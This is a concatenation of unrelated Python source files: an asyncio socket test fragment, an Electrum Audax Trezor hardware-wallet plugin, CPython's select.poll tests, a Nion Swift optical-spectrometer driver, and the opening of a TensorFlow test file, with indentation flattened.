"offset must be a non-negative integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, -1))
class TestSelectorUtils(test_utils.TestCase):
def check_set_nodelay(self, sock):
opt = sock.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY)
self.assertFalse(opt)
base_events._set_nodelay(sock)
opt = sock.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY)
self.assertTrue(opt)
@unittest.skipUnless(hasattr(socket, 'TCP_NODELAY'),
'need socket.TCP_NODELAY')
def test_set_nodelay(self):
sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM,
proto=socket.IPPROTO_TCP)
with sock:
self.check_set_nodelay(sock)
sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM,
proto=socket.IPPROTO_TCP)
with sock:
sock.setblocking(False)
self.check_set_nodelay(sock)
if __name__ == '__main__':
unittest.main()
trezor.py
import traceback
import sys
from typing import NamedTuple, Any
from electrum_audax.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum_audax.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum_audax.bip32 import BIP32Node, convert_bip32_path_to_list_of_uint32 as parse_path
from electrum_audax import constants
from electrum_audax.i18n import _
from electrum_audax.plugin import Device
from electrum_audax.transaction import deserialize, Transaction
from electrum_audax.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum_audax.base_wizard import ScriptTypeNotSupported, HWD_SETUP_NEW_WALLET
from electrum_audax.logging import get_logger
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
LibraryFoundButUnusable, OutdatedHwFirmwareException)
_logger = get_logger(__name__)
try:
import trezorlib
import trezorlib.transport
from trezorlib.transport.bridge import BridgeTransport, call_bridge
from .clientbase import TrezorClientBase
from trezorlib.messages import (
RecoveryDeviceType, HDNodeType, HDNodePathType,
InputScriptType, OutputScriptType, MultisigRedeemScriptType,
TxInputType, TxOutputType, TxOutputBinType, TransactionType, SignTx)
RECOVERY_TYPE_SCRAMBLED_WORDS = RecoveryDeviceType.ScrambledWords
RECOVERY_TYPE_MATRIX = RecoveryDeviceType.Matrix
TREZORLIB = True
except Exception as e:
_logger.exception('error importing trezorlib')
TREZORLIB = False
RECOVERY_TYPE_SCRAMBLED_WORDS, RECOVERY_TYPE_MATRIX = range(2)
# Trezor initialization methods
TIM_NEW, TIM_RECOVER = range(2)
TREZOR_PRODUCT_KEY = 'Trezor'
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = TREZOR_PRODUCT_KEY
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d" % sequence  # sequence is a (change, address_index) pair
msg_sig = client.sign_message(address_path, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorInitSettings(NamedTuple):
word_count: int
label: str
pin_enabled: bool
passphrase_enabled: bool
recovery_type: Any = None
no_backup: bool = False
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://wallet.trezor.io'
libraries_URL = 'https://github.com/trezor/python-trezor'
minimum_firmware = (1, 5, 2)
keystore_class = TrezorKeyStore
minimum_library = (0, 11, 0)
maximum_library = (0, 12)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
DEVICE_IDS = (TREZOR_PRODUCT_KEY,)
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
super().__init__(parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import trezorlib
try:
version = trezorlib.__version__
except Exception:
version = 'unknown'
if TREZORLIB:
return version
else:
raise LibraryFoundButUnusable(library_version=version)
def enumerate(self):
# If there is a bridge, prefer that.
# On Windows, the bridge runs as Admin (and Electrum usually does not),
# so the bridge has a better chance of finding devices. See #5420.
# This also avoids duplicate entries.
try:
call_bridge("enumerate")
except Exception:
devices = trezorlib.transport.enumerate_devices()
else:
devices = BridgeTransport.enumerate()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key=TREZOR_PRODUCT_KEY,
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = trezorlib.transport.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
# note that this call can still raise!
return TrezorClientBase(transport, handler, self)
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore; can use the xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Audax"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as Qt doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, device_id)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.daemon = True  # setDaemon() is deprecated in favor of the daemon attribute
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings: TrezorInitSettings, method, device_id, wizard, handler):
if method == TIM_RECOVER and settings.recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength_from_word_count = {12: 128, 18: 192, 24: 256}
client.reset_device(
strength=strength_from_word_count[settings.word_count],
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label,
no_backup=settings.no_backup)
elif method == TIM_RECOVER:
client.recover_device(
recovery_type=settings.recovery_type,
word_count=settings.word_count,
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label)
if settings.recovery_type == RECOVERY_TYPE_MATRIX:
handler.close_matrix_dialog()
else:
raise RuntimeError("Unsupported recovery method")
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return HDNodePathType(node=node, address_n=address_n)
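# _make_node_path() translates an Electrum BIP32 node into trezorlib's
# HDNodeType. The fingerprint and child number are serialized big-endian
# in BIP32 extended keys, hence the int.from_bytes(..., 'big') calls
# above.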
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
if not client.is_uptodate():
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
raise OutdatedHwFirmwareException(msg)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
is_creating_wallet = purpose == HWD_SETUP_NEW_WALLET
client.get_xpub('m', 'standard', creating=is_creating_wallet)
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_trezor_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_trezor_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
        prev_tx = {bfh(txhash): self.electrum_tx_to_txtype(tx, xpub_path) for txhash, tx in prev_tx.items()}
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, xpub_path, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
details = SignTx(lock_time=tx.locktime, version=tx.version)
signatures, _ = client.sign_tx(self.get_coin_name(), inputs, outputs, details=details, prev_txes=prev_tx)
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
script_type = self.get_trezor_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for _, xpub in sorted_pairs])
else:
multisig = None
client = self.get_client(keystore)
client.show_address(address_path, script_type, multisig)
def tx_inputs(self, tx, xpub_path, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
xpubs = [parse_xpubkey(x) for x in x_pubkeys]
multisig = self._make_multisig(txin.get('num_sig'), xpubs, txin.get('signatures'))
script_type = self.get_trezor_input_script_type(txin['type'])
txinputtype = TxInputType(
script_type=script_type,
multisig=multisig)
# find which key is mine
for xpub, deriv in xpubs:
if xpub in xpub_path:
xpub_n = parse_path(xpub_path[xpub])
txinputtype.address_n = xpub_n + deriv
break
prev_hash = bfh(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs, signatures=None):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
if signatures is None:
signatures = [b''] * len(pubkeys)
elif len(signatures) != len(pubkeys):
raise RuntimeError('Mismatched number of signatures')
else:
signatures = [bfh(x)[:-1] if x else b'' for x in signatures]
return MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=signatures,
m=m)
def tx_outputs(self, derivation, tx: Transaction):
def create_output_by_derivation():
script_type = self.get_trezor_output_script_type(info.script_type)
deriv = parse_path("/%d/%d" % index)
multisig = self._make_multisig(m, [(xpub, deriv) for xpub in xpubs])
txoutputtype = TxOutputType(
multisig=multisig,
amount=amount,
address_n=parse_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
                # prioritise hiding outputs on the 'change' branch from the user,
                # because no more than one change address is allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if info.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx, xpub_path):
t = TransactionType()
if tx is None:
            # probably a segwit input, in which case we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
t.inputs = self.tx_inputs(tx, xpub_path)
t.bin_outputs = [
TxOutputBinType(amount=vout['value'], script_pubkey=bfh(vout['scriptPubKey']))
for vout in d['outputs']
]
return t
|
test_poll.py
|
# Test case for the select.poll() function
import os
import random
import select
try:
import threading
except ImportError:
threading = None
import time
import unittest
from test.test_support import TESTFN, run_unittest, reap_threads, cpython_only
try:
select.poll
except AttributeError:
raise unittest.SkipTest, "select.poll not defined -- skipping test_poll"
def find_ready_matching(ready, flag):
match = []
for fd, mode in ready:
if mode & flag:
match.append(fd)
return match
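# Illustrative note (not part of the original test): poll() returns a list of
# (fd, eventmask) pairs, so find_ready_matching(ready, select.POLLIN) picks out
# just the descriptors that are readable. For example, given
#   ready = [(3, select.POLLIN), (4, select.POLLOUT)]
# find_ready_matching(ready, select.POLLIN) would return [3].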
class PollTests(unittest.TestCase):
def test_poll1(self):
# Basic functional test of poll object
        # Create a bunch of pipes and test that poll works with them.
p = select.poll()
NUM_PIPES = 12
MSG = " This is a test."
MSG_LEN = len(MSG)
readers = []
writers = []
r2w = {}
w2r = {}
for i in range(NUM_PIPES):
rd, wr = os.pipe()
p.register(rd)
p.modify(rd, select.POLLIN)
p.register(wr, select.POLLOUT)
readers.append(rd)
writers.append(wr)
r2w[rd] = wr
w2r[wr] = rd
bufs = []
while writers:
ready = p.poll()
ready_writers = find_ready_matching(ready, select.POLLOUT)
if not ready_writers:
raise RuntimeError, "no pipes ready for writing"
wr = random.choice(ready_writers)
os.write(wr, MSG)
ready = p.poll()
ready_readers = find_ready_matching(ready, select.POLLIN)
if not ready_readers:
raise RuntimeError, "no pipes ready for reading"
rd = random.choice(ready_readers)
buf = os.read(rd, MSG_LEN)
self.assertEqual(len(buf), MSG_LEN)
bufs.append(buf)
            os.close(r2w[rd]); os.close(rd)
            p.unregister(r2w[rd])
            p.unregister(rd)
writers.remove(r2w[rd])
self.assertEqual(bufs, [MSG] * NUM_PIPES)
def poll_unit_tests(self):
# returns NVAL for invalid file descriptor
FD = 42
try:
os.close(FD)
except OSError:
pass
p = select.poll()
p.register(FD)
r = p.poll()
self.assertEqual(r[0], (FD, select.POLLNVAL))
f = open(TESTFN, 'w')
fd = f.fileno()
p = select.poll()
p.register(f)
r = p.poll()
self.assertEqual(r[0][0], fd)
f.close()
r = p.poll()
self.assertEqual(r[0], (fd, select.POLLNVAL))
os.unlink(TESTFN)
# type error for invalid arguments
p = select.poll()
self.assertRaises(TypeError, p.register, p)
self.assertRaises(TypeError, p.unregister, p)
# can't unregister non-existent object
p = select.poll()
self.assertRaises(KeyError, p.unregister, 3)
# Test error cases
pollster = select.poll()
class Nope:
pass
class Almost:
def fileno(self):
return 'fileno'
self.assertRaises(TypeError, pollster.register, Nope(), 0)
self.assertRaises(TypeError, pollster.register, Almost(), 0)
# Another test case for poll(). This is copied from the test case for
# select(), modified to use poll() instead.
def test_poll2(self):
cmd = 'for i in 0 1 2 3 4 5 6 7 8 9; do echo testing...; sleep 1; done'
p = os.popen(cmd, 'r')
pollster = select.poll()
pollster.register( p, select.POLLIN )
for tout in (0, 1000, 2000, 4000, 8000, 16000) + (-1,)*10:
fdlist = pollster.poll(tout)
if (fdlist == []):
continue
fd, flags = fdlist[0]
if flags & select.POLLHUP:
line = p.readline()
if line != "":
self.fail('error: pipe seems to be closed, but still returns data')
continue
elif flags & select.POLLIN:
line = p.readline()
if not line:
break
continue
else:
self.fail('Unexpected return value from select.poll: %s' % fdlist)
p.close()
def test_poll3(self):
# test int overflow
pollster = select.poll()
pollster.register(1)
self.assertRaises(OverflowError, pollster.poll, 1L << 64)
        # Sanity check: simple arithmetic still works, i.e. the failed poll()
        # call above did not corrupt the interpreter state.
        x = 2 + 3
        if x != 5:
            self.fail('Overflow must have occurred')
# Issues #15989, #17919
self.assertRaises(OverflowError, pollster.register, 0, -1)
self.assertRaises(OverflowError, pollster.register, 0, 1 << 64)
self.assertRaises(OverflowError, pollster.modify, 1, -1)
self.assertRaises(OverflowError, pollster.modify, 1, 1 << 64)
@cpython_only
def test_poll_c_limits(self):
from _testcapi import USHRT_MAX, INT_MAX, UINT_MAX
pollster = select.poll()
pollster.register(1)
# Issues #15989, #17919
self.assertRaises(OverflowError, pollster.register, 0, USHRT_MAX + 1)
self.assertRaises(OverflowError, pollster.modify, 1, USHRT_MAX + 1)
self.assertRaises(OverflowError, pollster.poll, INT_MAX + 1)
self.assertRaises(OverflowError, pollster.poll, UINT_MAX + 1)
@unittest.skipUnless(threading, 'Threading required for this test.')
@reap_threads
def test_threaded_poll(self):
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
rfds = []
for i in range(10):
fd = os.dup(r)
self.addCleanup(os.close, fd)
rfds.append(fd)
pollster = select.poll()
for fd in rfds:
pollster.register(fd, select.POLLIN)
t = threading.Thread(target=pollster.poll)
t.start()
try:
time.sleep(0.5)
# trigger ufds array reallocation
for fd in rfds:
pollster.unregister(fd)
pollster.register(w, select.POLLOUT)
self.assertRaises(RuntimeError, pollster.poll)
finally:
# and make the call to poll() from the thread return
os.write(w, b'spam')
t.join()
def test_main():
run_unittest(PollTests)
if __name__ == '__main__':
test_main()
|
optspec_inst.py
|
# standard libraries
import threading
import numpy
import queue
import logging
from nion.utils import Event
from nion.utils import Observable
from nion.swift.model import HardwareSource
from ..aux_files.config import read_data
class OptSpecDevice(Observable.Observable):
def __init__(self, MANUFACTURER):
self.property_changed_event = Event.Event()
self.property_changed_power_event = Event.Event()
self.communicating_event = Event.Event()
self.busy_event = Event.Event()
self.send_gratings = Event.Event()
self.warn_panel = Event.Event()
self.send_data = Event.Event()
self.warn_panel_over = Event.Event()
self.__queue = queue.Queue()
self.__running = False
self.__successful = False
self.__model = MANUFACTURER
self.__thread = None
def init(self):
if self.__model == 'DEBUG':
from . import spec_vi as optSpec
elif self.__model == 'ATTOLIGHT':
from . import spec_attolight as optSpec
        elif self.__model == 'PRINCETON':
            from . import spec as optSpec
        else:
            # Fail fast instead of leaving optSpec unbound (NameError below).
            raise ValueError('Unknown spectrometer model: {}'.format(self.__model))
self.__sendmessage = optSpec.SENDMYMESSAGEFUNC(self.sendMessageFactory())
if self.__model == 'PRINCETON':
set_file = read_data.FileManager('global_settings')
SERIAL_PORT_PRINCETON = set_file.settings["spectrometer"]["COM_PRINCETON"]
self.__Spec = optSpec.OptSpectrometer(self.__sendmessage, SERIAL_PORT_PRINCETON)
else:
self.__Spec = optSpec.OptSpectrometer(self.__sendmessage)
if not self.__Spec.success:
return False
self.__gratings = self.__Spec.gratingNames()
self.send_gratings.fire(self.__gratings)
self.__lpmms = self.__Spec.gratingLPMM()
self.__fl = self.__Spec.get_specFL()
self.__cameraSize = 25.6
self.__cameraPixels = self.__Spec.camera_pixels()
self.__cameraName = self.__Spec.which_camera()
self.__devAngle = self.__Spec.deviation_angle()
self.__eirecamera = HardwareSource.HardwareSourceManager().get_hardware_source_for_hardware_source_id(
self.__cameraName)
        return self.__eirecamera is not None
def upt(self):
self.property_changed_event.fire('wav_f')
self.property_changed_event.fire('grating_f')
self.property_changed_event.fire('entrance_slit_f')
self.property_changed_event.fire('exit_slit_f')
self.property_changed_event.fire('which_slit_f')
self.property_changed_event.fire('lpmm_f')
self.property_changed_event.fire('dispersion_nmmm_f')
self.property_changed_event.fire('pixel_size_f')
self.property_changed_event.fire('dispersion_pixels_f')
self.property_changed_event.fire('fov_f')
self.property_changed_event.fire('camera_size_f')
self.property_changed_event.fire('camera_pixels_f')
self.property_changed_event.fire('focalLength_f')
self.upt_calibs()
if not self.__successful: self.__successful = True
def upt_values(self):
self.property_changed_event.fire('wav_f')
self.property_changed_event.fire('lpmm_f')
self.property_changed_event.fire('dispersion_nmmm_f')
self.property_changed_event.fire('pixel_size_f')
self.property_changed_event.fire('dispersion_pixels_f')
self.property_changed_event.fire('fov_f')
self.property_changed_event.fire('camera_size_f')
self.property_changed_event.fire('camera_pixels_f')
self.property_changed_event.fire('focalLength_f')
self.upt_calibs()
def upt_calibs(self):
        if self.__eirecamera.camera.camera_model in ('Newton', 'ProEM+: 1600xx(2)B eXcelon'):
self.__eirecamera.camera.calibration = [{"offset": 0, "scale": 1, "units": ""},
{"offset": self.__wl - self.dispersion_f * self.__cameraSize / 2.,
"scale": self.dispersion_f * self.__cameraSize / self.__cameraPixels,
"units": "nm"}]
else:
logging.info('***OPT SPECT***: Camera not configured in upt_calibs.')
# elif self.__eirecamera.camera.camera_model == 'ProEM+: 1600xx(2)B eXcelon':
# if self.__eirecamera.camera.sizey == 1:
# self.__eirecamera.camera.calibration = [{"offset": self.__wl - self.dispersion_f * self.__cameraSize / 2.,
# "scale": self.dispersion_f * self.__cameraSize / self.__cameraPixels,
# "units": "nm"}]
# else:
# self.__eirecamera.camera.calibration = [{"offset": 0, "scale": 1, "units": ""},
# {"offset": self.__wl - self.dispersion_f * self.__cameraSize / 2.,
# "scale": self.dispersion_f * self.__cameraSize / self.__cameraPixels,
# "units": "nm"}]
def measure(self):
self.__running = True
self.busy_event.fire('')
self.warn_panel.fire()
self.__thread = threading.Thread(target=self.measureThread)
self.__thread.start()
def measureThread(self):
index = 0
while self.__running:
cam_data = self.__eirecamera.grab_next_to_finish()[0]
cam_hor = numpy.sum(cam_data.data, axis=0) if len(cam_data.data.shape) > 1 else cam_data.data
cam_total = numpy.sum(cam_hor)
self.send_data.fire(cam_total, index)
index += 1
if index == 200: index = 0
def abort(self):
try:
if self.__running:
self.__running = False
self.__thread.join()
self.warn_panel_over.fire()
except AttributeError:
            # No measurement was running.
pass
self.property_changed_event.fire('')
def sendMessageFactory(self):
def sendMessage(message):
if message:
self.__running = False
self.upt_values()
self.property_changed_event.fire('wav_f')
if self.__successful: self.upt_calibs()
return sendMessage
@property
def wav_f(self):
try:
self.__wl = self.__Spec.get_wavelength()
return format(self.__wl, '.3f')
except AttributeError:
return 'None'
@wav_f.setter
def wav_f(self, value):
if self.__wl != float(value) and 0 <= float(value) <= 2500:
self.__wl = float(value)
self.busy_event.fire("")
if not self.__running: threading.Thread(target=self.__Spec.set_wavelength, args=(self.__wl,)).start()
self.__running = True
@property
def grating_f(self):
try:
self.__grating = self.__Spec.get_grating()
return self.__grating
except AttributeError:
return 0
@grating_f.setter
def grating_f(self, value):
if self.__grating != value:
self.__grating = value
self.busy_event.fire("")
if not self.__running: threading.Thread(target=self.__Spec.set_grating, args=(self.__grating,)).start()
self.__running = True
@property
def lpmm_f(self):
try:
return self.__lpmms[self.__grating]
except AttributeError:
return 'None'
@property
def inc_angle_f(self):
try:
return self.dif_angle_f - self.__devAngle
except AttributeError:
return 'None'
@property
def dif_angle_f(self):
        '''
        This is somewhat complicated. devAngle is a spectrometer property: a simple
        constraint between two slits (central and camera center) and two angles. The
        incidence angle minus the diffraction angle is always constant in a given
        spectrometer. Please see equation 2-4 in the Diffraction Grating Handbook by
        Christopher Palmer. ab2 is the incidence angle plus the diffracted angle,
        divided by two.
        '''
try:
ab2 = numpy.arcsin((1 / 2. * 1e-6 * self.__wl * self.lpmm_f) / numpy.cos(self.__devAngle / 2.))
return (2 * ab2 + self.__devAngle) / 2.
except AttributeError:
return 'None'
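    # Illustrative worked example (assumed numbers, not from the original code):
    # with a 300 l/mm grating, wl = 500 nm and devAngle = 0.52 rad,
    #   ab2 = arcsin((0.5e-6 * 500 * 300) / cos(0.26)) = arcsin(0.0776) ~= 0.0777 rad,
    # so dif_angle_f = (2 * 0.0777 + 0.52) / 2 ~= 0.338 rad (~19.4 degrees).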
@property
def dispersion_f(self):
        '''
        Also confusing, but this is just the derivative of the diffraction equation.
        Note that alpha depends on wavelength, but its derivative is zero because the
        entrance side is fixed; we want the angular dispersion of the diffracted beam,
        not of the entrance beam. See the Diffraction Grating Handbook by Christopher
        Palmer. This is often called the reciprocal linear dispersion; it is measured
        in nm/mm.
        '''
try:
return 1e6 / self.__lpmms[self.__grating] * numpy.cos(self.dif_angle_f) / self.__fl
except AttributeError:
return 'None'
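    # Continuing the same assumed numbers: groove spacing is 1e6 / 300 ~= 3333 nm,
    # so with a 300 mm focal length dispersion_f = 3333 * cos(0.338) / 300
    # ~= 10.5 nm/mm; a 25.6 mm camera with 1600 pixels then sees roughly
    # 0.17 nm per pixel.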
@property
def entrance_slit_f(self):
try:
self.__entrance_slit = self.__Spec.get_entrance()
return self.__entrance_slit
except AttributeError:
return 'None'
@entrance_slit_f.setter
def entrance_slit_f(self, value):
if self.__entrance_slit != float(value) and 0 <= float(value) <= 5000:
self.__entrance_slit = float(value)
self.busy_event.fire("")
if not self.__running: threading.Thread(target=self.__Spec.set_entrance,
args=(self.__entrance_slit,)).start()
self.__running = True
@property
def exit_slit_f(self):
try:
self.__exit_slit = self.__Spec.get_exit()
return self.__exit_slit
except AttributeError:
return 'None'
@exit_slit_f.setter
def exit_slit_f(self, value):
if self.__exit_slit != float(value) and 0 <= float(value) <= 5000:
self.__exit_slit = float(value)
self.busy_event.fire("")
if not self.__running: threading.Thread(target=self.__Spec.set_exit, args=(self.__exit_slit,)).start()
self.__running = True
@property
def which_slit_f(self):
try:
self.__slit_choice = self.__Spec.get_which()
return self.__slit_choice
except AttributeError:
return -1
@which_slit_f.setter
def which_slit_f(self, value):
if self.__slit_choice != value:
self.__slit_choice = value
self.busy_event.fire("")
if not self.__running: threading.Thread(target=self.__Spec.set_which, args=(self.__slit_choice,)).start()
self.__running = True
@property
def camera_size_f(self):
try:
return format(self.__cameraSize, '.1f')
except AttributeError:
return 'None'
@camera_size_f.setter
def camera_size_f(self, value):
self.__cameraSize = float(value)
self.upt_values()
@property
def camera_pixels_f(self):
try:
return format(self.__cameraPixels, '.0f')
except AttributeError:
return 'None'
@camera_pixels_f.setter
def camera_pixels_f(self, value):
self.__cameraPixels = int(value)
self.upt_values()
@property
def focalLength_f(self):
try:
return format(self.__fl, '.0f')
except AttributeError:
return 'None'
@focalLength_f.setter
def focalLength_f(self, value):
self.__fl = int(value)
self.upt_values()
@property
def pixel_size_f(self):
try:
return self.__cameraSize / self.__cameraPixels * 1e3
except AttributeError:
return 'None'
@property
def dispersion_nmmm_f(self):
try:
return format(self.dispersion_f, '.3f')
except ValueError:
return 'None'
except AttributeError:
return 'None'
@property
def dispersion_pixels_f(self):
try:
return format(self.dispersion_f * self.__cameraSize / self.__cameraPixels, '.3f')
except AttributeError:
return 'None'
@property
def fov_f(self):
try:
return format(self.dispersion_f * self.__cameraSize, '.3f')
except AttributeError:
return 'None'
|
application_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
